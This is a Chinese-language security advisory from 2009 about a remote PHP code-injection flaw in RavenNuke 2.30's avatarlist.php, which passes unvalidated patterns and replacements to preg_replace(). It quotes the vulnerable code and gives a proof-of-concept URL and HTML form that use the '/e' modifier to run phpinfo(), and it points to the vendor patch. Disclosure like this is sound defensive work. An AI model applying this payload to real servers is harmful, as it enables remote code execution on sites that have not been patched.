发布日期：2009-02-16
更新日期：2009-02-19

受影响系统：

Raven RavenNuke 2.30

不受影响系统：

Raven RavenNuke 2.30.1

描述：

---

BUGTRAQ  ID: 33787
CVE(CAN) ID: CVE-2009-0679,CVE-2009-0678,CVE-2009-0677,CVE-2009-0674,CVE-2009-0673,CVE-2009-0672

RavenNuke是基于PHP和MySQL的自动新闻发布和内容管理系统。

RavenNuke的avatarlist.php模块没有正确地验证对preg_replace()调用所传送的patterns和replacements参数，远程攻击者可以通过向服务器提交恶意请求导致注入并执行任意PHP代码。以下是有漏洞的代码段：

$patterns[0] = '/\.gif/';
$patterns[1] = '/\.png/';
...
$replacements[1] = '';
$replacements[0] = '';
...
$entryname = preg_replace($patterns, $replacements, $entry);

<*来源：Janek Vind （come2waraxe@yahoo.com）
  
  链接：http://secunia.com/advisories/33928/
        http://marc.info/?l=bugtraq&m=123480740116849&w=2
        http://secunia.com/advisories/34098/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://localhost/ravennuke230/modules.php?name=Your_Account&op=avatarlist&avatarcategory=gallery&patterns[6]=/a/e&replacements[6]=phpinfo()

<html><body><center>
<form action="http://localhost/ravennuke230/modules.php?
name=Your_Account&op=avatarlist" method="post">
<input type="hidden" name="avatarcategory" value="gallery">
<input type="hidden" name="patterns[6]" value="/a/e">
<input type="hidden" name="replacements[6]" value="phpinfo()">
<input type="submit" value="Test!">
</form>
</center></body></html>

建议：

---

厂商补丁：

Raven
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://ravenphpscripts.com/

浏览次数：3318
严重程度：0（网友投票）